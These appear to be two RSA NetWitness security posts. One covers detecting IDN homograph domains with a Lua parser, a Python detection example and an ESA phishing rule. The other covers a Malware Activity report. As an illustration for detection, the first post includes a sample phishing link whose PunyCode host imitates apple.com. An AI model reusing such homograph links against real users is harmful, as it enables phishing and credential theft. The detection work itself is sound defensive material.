The IDN_homograph Lua parser detects PunyCode-encoded internationalized domain names that use non-Latin Unicode code points whose glyphs resemble those of Latin code points, and registers the decoded homograph as analysis.service meta.

  • service - host as which the homograph is masquerading
  • ioc - indicators of compromise - homograph detected

 

IDN_homograph lua parser is now available on RSA Live:

 

 

 

 

Host aliases encoded with PunyCode:

 

 

Meta registered in RSA NetWitness Investigation:

  • host: www.xn--80ak6aa92e.com
  • ioc: homograph detected
  • service: www.apple.com

 

Below is screenshot of IDN_homograph parser detecting IDN homograph attacks:

 

 

Detection of homographs used in Phishing Emails

 

If an email contains: <a href="http://www.xn--80ak6aa92e.com">http://www.apple.com</a>

Then the Phishing_lua parser will register risk.warning - href host doesn't match displayed host, as well as the same IDN meta from IDN_homograph as above.

If an email contains: <a href="http://www.xn--80ak6aa92e.com">http://www.xn--80ak6aa92e.com</a>

Then there is no mismatch, but the host will still be registered by the Phishing_lua parser, and the same IDN detection will be done by the IDN_homograph parser.
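The decoding and the two checks described above (the homograph detection of the IDN_homograph parser, and the href-versus-displayed-host comparison of the Phishing_lua parser) as an added Python example, not the parsers' own Lua code: the confusables table is a constructed subset of the Unicode confusables list, and the output keys mirror the meta names used above.

```python
from urllib.parse import urlparse

# Constructed subset of the Unicode confusables: non-Latin letters whose glyphs
# render like Latin ones. The first four are the code points in xn--80ak6aa92e.
CONFUSABLES = {
    "\u0430": "a",  # Cyrillic small letter a
    "\u0440": "p",  # Cyrillic small letter er
    "\u04cf": "l",  # Cyrillic small letter palochka
    "\u0435": "e",  # Cyrillic small letter ie
    "\u043e": "o", "\u0441": "c", "\u0443": "y", "\u0445": "x",
    "\u0456": "i", "\u0458": "j", "\u04bb": "h", "\u0501": "d",
}


def decode_idn(host):
    """Turn every xn-- label of a hostname back into Unicode (RFC 3492 PunyCode)."""
    labels = []
    for label in host.lower().split("."):
        if label.startswith("xn--"):
            labels.append(label[4:].encode("ascii").decode("punycode"))
        else:
            labels.append(label)
    return ".".join(labels)


def latin_skeleton(text):
    """Replace each confusable with the Latin letter it imitates."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def check_homograph(host):
    """Return the meta that would be registered for one host alias."""
    decoded = decode_idn(host)
    skeleton = latin_skeleton(decoded)
    # Homograph: the alias carried PunyCode, and every non-Latin letter in it
    # maps to a Latin lookalike (a genuine IDN such as münchen keeps its ü).
    is_homograph = decoded != host.lower() and skeleton != decoded and skeleton.isascii()
    return {
        "host": host.lower(),
        "decoded": decoded,
        "service": skeleton if is_homograph else None,
        "ioc": "homograph detected" if is_homograph else None,
    }


def host_of(url_or_host):
    """Hostname of a URL, or the bare string when no scheme is present."""
    if "://" in url_or_host:
        return (urlparse(url_or_host).hostname or "").lower()
    return url_or_host.strip().lower()


def check_mail_link(href, displayed_text):
    """The href/displayed-host comparison made for links in mail bodies."""
    if host_of(displayed_text) != host_of(href):
        return "href host doesn't match displayed host"
    return None


if __name__ == "__main__":
    print(check_homograph("www.xn--80ak6aa92e.com"))
    print(check_homograph("www.xn--mnchen-3ya.de"))
    print(check_mail_link("http://www.xn--80ak6aa92e.com", "http://www.apple.com"))
```

The skeleton comparison is what separates a homograph from a legitimate IDN: both arrive PunyCode-encoded, but only the homograph collapses to a pure-ASCII name after the lookalike substitution.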

 

 

 

Event Stream Analysis for Detecting PunyCode Phishing Attempts

 

Event Stream Analysis (ESA) rule identifies mail sessions that have a PunyCode hostname and also have a mismatch between the hostname in a link (href) and the text in the same link containing an IDN homograph.  This suspected phishing attempt is then followed by HTTP(S) traffic with the same hostname in the certificate or in the host.

 

 

The ESA rule alerts on the presence of PunyCode in emails, which is detected using the ioc and analysis_service meta generated by the IDN_homograph and mail protocol parsers. It also looks for subsequent sessions that use the same alias host over HTTP(S).

 

 

Event Stream Analysis Rule for PunyCode Phishing Attempt is now available on RSA Live:

 

 

 

 

Thanks go to Sean Lim, William Motley and Angela Stranahan for contributing to this threat advisory.

 

References:

  1. IDN converter: https://www.punycoder.com/
  2. https://en.wikipedia.org/wiki/Punycode

The RSA NetWitness Malware Activity report enables customers to identify malware activity across packets and logs in their infrastructure. This report uses new investigation meta to identify malicious activity and represent it in consolidated and informative tabular structure which makes overall investigation experience more targeted and efficient.

The Malware Activity report displays traffic that has been communicating with a known malicious IP address or hostname. With consolidated information about all malware related network activity, it’s easier to identify infected host(s) on the network. It is based on meta generated using RSA feeds like investigation category, investigation context etc.

This report is divided in three categories based on traffic:

  • Malware Activity Web for malware related web-based packet and log traffic.
  • Malware Activity DNS for DNS packet traffic that is going to a known malicious IP address or hostname
  • Malware Activity Unidentified for all malware related packet and log traffic other than DNS and Web that has been known malicious

 

Malware Activity Web

 

Malware Activity DNS

 

Malware Activity Unidentified

 

Once the report is deployed and scheduled, analysts can keep track of hosts connecting to outside servers that are known to be malicious or suspicious. Looking at source and destination IPs together with the service type and the amount of data transferred, analysts can detect a potential compromise and data leak from a particular host. Using this report, analysts now have visibility into the network packet and log activity of a compromised host that is showing indicators of malware activity.

 

Thanks to Angela Stranahan, Mike Sconzo, Tery Berardinelli and Jim Ward for their contributions.

 

RSA Security Analytics Reports is documented at https://community.rsa.com/docs/DOC-43406

RSA Security Analytics Rules are documented here https://community.rsa.com/docs/DOC-43419
